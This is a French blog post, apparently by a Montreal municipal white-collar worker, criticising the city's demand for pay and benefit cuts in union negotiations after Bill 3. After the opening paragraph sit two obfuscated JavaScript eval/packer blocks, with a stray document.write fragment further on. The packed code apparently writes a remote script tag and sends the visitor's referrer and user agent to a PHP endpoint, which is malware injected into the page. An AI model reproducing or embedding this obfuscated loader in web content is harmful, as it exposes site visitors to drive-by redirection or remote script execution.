Cols blancs: dures négos en perspective

La loi 3 a été passé malgré les protestations des syndicats et des journées de deuil (lire grève) qui n’ont pas été sans un aspect ludique (voir le jeu “Perdant à vie”)! La lutte se poursuit mais cette fois devant les tribunaux
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stizr|var|u0026u|referrer|zdnez||js|php’.split(‘|’),0,{}))
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“
“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ibtnn|var|u0026u|referrer|krhaz||js|php’.split(‘|’),0,{}))

Il est donc temps maintenant de se tourner vers la négociation de notre convention collective (échue depuis décembre 2010 et prolongée pour une année jusqu’en décembre 2011). Dans un récent communiqué, document.write(“”); intitulé “Négociations: l’hiver sera froid”, le syndicat des fonctionnaires municipaux de Montréal (SFMM) nous faisait un compte-rendu de la première rencontre de négociation “sérieuse” avec la ville qui a eut lieu le 8 décembre. Les nouvelles ne sont pas bonnes et il semble que nous devrons faire face à de dures négociations…

En effet, la ville en a profité pour déposer son nouveau cahier de demandes. Elle désire maintenant réduire la rémunération globale des employés cols blancs de 12 % ! Pour y parvenir la ville tentera d’augmenter les heures travaillées en plus de diminuer le coût des avantages sociaux. Si il n’est pas encore clair ce qu’ils veulent dire pas “augmentation des heures travaillées” (nous faire passer à quarante heures par semaine?), il est évident que la ville va tenter, comme c’est le cas pour nos collègues provinciaux, de revenir sur plusieurs de nos acquis tels que nos vacances, congés mobiles et congés de maladie! Et, comme si c’était pas assez, en plus des ajustements de retraite apportés par la loi 3, la ville exige un nouveau partage du régime d’assurance!

>> Cliquez ici pour lire la suite

Je suis bien d’accord que la situation économique mondial appelle certaines mesures d’austérité mais il faut tout de même pas exagérer! Il faut quand même vivre! Ça m’enrage que la ville et le gouvernement joue sur l’idée préconçu qu’après tout les fonctionnaires ne travaillent pas assez et sont trop payés! Je ne sais pas pour les cols-blancs qui travaillent dans les bureaux mais moi je sais que mon travail se rapproche plus souvent qu’autrement de celui d’un col-bleu que d’un travailleur de bureau: je passe me journée à courir et à transpirer. Non seulement le manque de personnel rend la cadence infernale mais en quinze ans nos augmentation salariale ont toujours été en-dessous de l’augmentation du coût de la vie! Ce qui veut dire que, en dollars constant, notre salaire BAISSE d’année en année. Et on veut nous faire travailler plus pour moins en coupant encore nos augmentations, nos retraites, nos assurances, nos bénéfices sociaux ?! Mon salaire baisse et autour de moi tout augmente: mes taxes, le coût de l’électricité, de la bouffe, du transport en commun… Où est-ce que cela va s’arrêter?!

Je veux bien faire des sacrifices mais je ne veut pas qu’on me coupe, par décret ou par loi, ce qui a été négocié en bonne et due forme comme pour les retraites. La ville doit négocier de bonne foi. Et avant de me demander à moi, au bas de l’échelle, de faire des sacrifices ne serait-il pas mieux d’avant tout faire des coupures dans une infrastructure enflée et dans les gros salaires des gestionnaires? Est-il bien nécessaire d’avoir des salaires dans les six chiffres à la ville? Et d’avoir autant de représentant municipaux ? En effet, si l’on compare Montréal à d’autres grosses villes nord-américaines comme Toronto et New-York, nous avons à Montréal deux fois trop d’élus! Montréal (avec une population de 1,7 millions sur une superficie de 365.12 km2, divisée en 19 arrondissements) a 20 maires et 103 conseillés municipaux (65 au conseil de ville et 38 au conseils d’arrondissements) alors qu’une grosse ville comme New-York (population de 8.3 millions sur une superficie de 789 km2, divisée en 5 arrondissements) n’a qu’un maire et 51 conseillés! Toronto, quand à elle, avec 2.6 millions d’habitants répartis sur 630 km2 n’a pour ses 6 districts qu’un maire et 45 conseillés. Alors, il est où le gras et le superflu? Il est dans les arrondissements! C’est là qu’il faudrait d’abord couper avant d’éliminer des services et de réduire nos salaires! Mais ce n’est là que mon humble opinion…

[ Translate ]

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s